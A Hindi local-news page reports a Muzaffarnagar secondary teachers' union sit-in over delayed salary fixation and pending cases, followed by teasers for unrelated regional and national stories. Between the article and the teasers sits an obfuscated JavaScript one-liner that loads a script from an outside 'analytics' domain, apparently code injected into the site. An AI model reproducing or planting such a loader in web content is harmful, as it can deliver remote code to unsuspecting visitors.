शिक्षकों का आक्रोश जारी, वेतन निर्धारण व लंबित प्रकरणों को लेकर माध्यमिक शिक्षक संघ का धरना जारी

मुजफ्फरनगर। उत्तर प्रदेश माध्यमिक शिक्षक संघ, जनपद मुजफ्फरनगर द्वारा जिला विद्यालय निरीक्षक (डीआईओएस) कार्यालय पर चल रहा अनिश्चितकालीन धरना जारी रहा। शिक्षकों ने लंबित प्रकरणों के निस्तारण में हो रही लापरवाही और अधिकारियों की उदासीनता के खिलाफ जोरदार प्रदर्शन किया।

धरने की अध्यक्षता करते हुए जिला अध्यक्ष डॉ. अमित कुमार जैन ने कहा कि डीआईओएस कार्यालय और वित्त एवं लेखा अधिकारी (माध्यमिक) के स्तर पर कई माह बीत जाने के बाद भी पदोन्नत शिक्षकों का वेतन निर्धारण नहीं किया गया है। इसके साथ ही मृतक आश्रितों के प्रकरणों का निस्तारण भी नहीं हो पा रहा है। उन्होंने आरोप लगाया कि अधिकारी अनावश्यक आपत्तियाँ लगाकर फाइलों को टालते रहते हैं और बातचीत करने पर अपने पटल पर किसी भी प्रकरण के लंबित न होने की बात कहते हैं, जबकि वास्तविकता इसके विपरीत है। इस रवैये से शिक्षकों में गहरा आक्रोश व्याप्त है।जिला मंत्री अरुण कुमार ने कहा कि जिले में चयन ग्रेड, प्रोन्नत वेतनमान और अन्य वित्तीय लाभों से जुड़े सैकड़ों प्रकरण महीनों से लंबित पड़े हैं। उन्होंने कहा कि शिक्षक लगातार कार्यालयों के चक्कर काट रहे हैं, लेकिन समाधान नहीं मिल पा रहा। यह न केवल शिक्षकों के साथ अन्याय है बल्कि शासन की नीतियों की अवहेलना भी है। वहीं जिला कोषाध्यक्ष संजय कुमार मोघा ने बताया कि नोशनल वेतन वृद्धि के सैकड़ों मामले एक वर्ष से अधिक समय से लंबित हैं। उन्होंने चेतावनी दी कि यदि शीघ्र कार्रवाई नहीं हुई, तो आंदोलन को और व्यापक बनाया जाएगा।धरने में प्रवीण कुमार शर्मा, सुरेंद्र सिंह, राजेंद्र सिंह, संजीव त्यागी, विरेंद्र कुमार, बृज बिहारी धुरिया, देवेश कुमार, सुनील कुमार त्यागी, धर्मपाल, सुभाषचंद्र, राजेश कुमार, सुनील गोयल, हेमंत बिश्नोई, अमित कुमार वर्मा, आदित्य गोयल, पद्माकर यादव, गौरव शर्मा, अजय त्यागी, सर्वेश कुमार, जय प्रकाश सरोज, रामबीर सिंह सहित सैकड़ों शिक्षक उपस्थित रहें

इसे भी पढ़ें:  मुजफ्फरनगर गांधी कॉलोनी फायरिंग दिनदहाड़े

;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);

Also Read This

समुद्र में नाव डूबी, 250 लापता…नौका में लगभग 280 लोग सवार थे

अंडमान- सागर में रोहिंग्या शरणार्थियों और बांग्लादेशी नागरिकों को ले जा रही एक नौका के पलटने से लगभग 250 लोगों के लापता होने की आशंका है। संयुक्त राष्ट्र (यूएन) ने इस दुखद घटना की पुष्टि की है। संयुक्त राष्ट्र शरणार्थी उच्चायुक्त (यूएनएचसीआर) ने एक बयान में कहा कि यह नौका दक्षिणी बांग्लादेश के टेक्नाफ से मलेशिया के लिए रवाना हुई थी। भारी हवाओं, उबड़-खाबड़ समुद्र और अत्यधिक भीड़भाड़ के कारण यह नौका डूब गई। प्रारंभिक जानकारी के अनुसार, नौका में लगभग 280 लोग सवार थे और इसने चार अप्रैल को बांग्लादेश छोड़ा था। हादसे में लापता लोगों में कई बच्चे भी शामिल हैं। बताया जा रहा है कि बोट पर

Read More »

खतौली: पुलिस की दबिश पूर्व सभासद के घर दबिश, महिलाओं से झड़प, एक गिरफ्तार

खतौली बुधवार को नगर के देवीदास मोहल्ले में उस समय हड़कंप मच गया जब पुलिस ने पूर्व सभासद विनोद शेरवान के मकान पर अचानक दबिश दी। पुलिस की इस कार्रवाई के दौरान स्थानिय लोगों और पुलिस के बीच जमकर हंगामा हुआ। बताया जा रहा है कि मौके पर मौजूद महिलाओं और पुलिसकर्मियों के बीच हाथापाई भी हुई, जिससे माहौल तनावपूर्ण हो गया। जानकारी के अनुसार, कुछ दिन पहले नशीले पदार्थ (गांजा) से जुड़े एक मामले में कार्रवाई हुई थी, जिसमें करीब ढाई किलो गांजा लगभग बरामद किया गया था। इस मामले में कई युवकों को गिरफ्तार कर जेल भेजा गया था। पुलिस को सूचना मिली थी कि पूर्व सभासद विनोद

Read More »

दरिद्र बच्चों से किया वादा निभाने मलिन बस्ती पहुंचे योगी के मंत्री

बच्चों, महिलाओं और पुरुषों से मिलकर सुनी पीड़ा, बच्चों की शिक्षा व्यवस्था को लेकर किया प्रेरित, जनकपुरी क्षेत्र में शिक्षा, स्वच्छता और मूलभूत सुविधाओं पर जोर, अधिकारियों को दिए सख्त निर्देश मुजफ्फरनगर। जनपद मुजफ्फरनगर के शहर की कालोनी जनकपुरी क्षेत्र से सटी मलिन बस्ती में बुधवार को उस समय हलचल बढ़ गई जब योगी सरकार के मंत्री और नगर विधायक कपिल देव अग्रवाल अचानक ही भ्रमण पर अधिकारियों के साथ वहां पहुंचे। अंबेडकर जयंती के मौके पर मंगलवार को मंत्री कपिल देव यहां आये थे और इसके अगले ही दिन बच्चों से किए गए वादे को निभाने पहुंचे मंत्री ने न केवल हालात का जायजा लिया, बल्कि शिक्षा और बुनियादी

Read More »

पवन खेड़ा को सुप्रीम कोर्ट से बड़ा झटका; अग्रिम जमानत पर लगी रोक

नई दिल्ली- सुप्रीम कोर्ट ने कांग्रेस नेता पवन खेड़ा को दी गई ट्रांजिट बेल पर रोक लगा दी और उन्हें तीन हफ्ते में जवाब देने का निर्देश दिया। हालांकि, कोर्ट ने यह स्पष्ट किया कि खेड़ा असम की अदालत में अग्रिम जमानत के लिए आवेदन कर सकते हैं। सुप्रीम कोर्ट ने कांग्रेस नेता पवन खेड़ा को दी गई एक हफ्ते की अग्रिम जमानत पर रोक लगा दी है। यह मामला असम में दर्ज उस एफआईआर से जुड़ा है, जिसमें खेड़ा पर आरोप है कि उन्होंने असम के मुख्यमंत्री हिमंत बिस्वा सरमा की पत्नी के खिलाफ कई पासपोर्ट रखने के आरोप लगाए थे। इसे भी पढ़ें:  जुगनू शर्मा प्रदेश महामंत्री मनोनीत,

Read More »

मुजफ्फरनगर न्यूमैक्स सिटी, मंसूरपुर प्रोजेक्ट विवाद, निवेशकों का हंगामा, रकम वापसी की मांग

मुजफ्फरनगर। दिल्ली-देहरादून नेशनल हाईवे-58 पर मंसूरपुर स्थित न्यूमैक्स सिटी प्रोजेक्ट एक बार फिर विवादों में आ गया है। इस बार गाजियाबाद से पहुंचे कई निवेशकों ने प्रोजेक्ट साइट पर पहुंचकर जमकर हंगामा किया और अपनी निवेश की गई रकम वापस करने की मांग उठाई। मौके पर पहुंचे निवेशकों का कहना था कि उन्हें कम समय में अच्छा मुनाफा देने का भरोसा दिलाकर पैसा लगवाया गया था, लेकिन तय समय बीतने के बाद भी न तो लाभ मिला और न ही मूल धन वापस किया गया। मौके पर मौजूद निवेशकों में काफी नाराजगी दिखी। निवेशकों ने यह भी कहा कि अब कंपनी से संपर्क करना भी मुश्किल हो गया है। निवेशकों

Read More »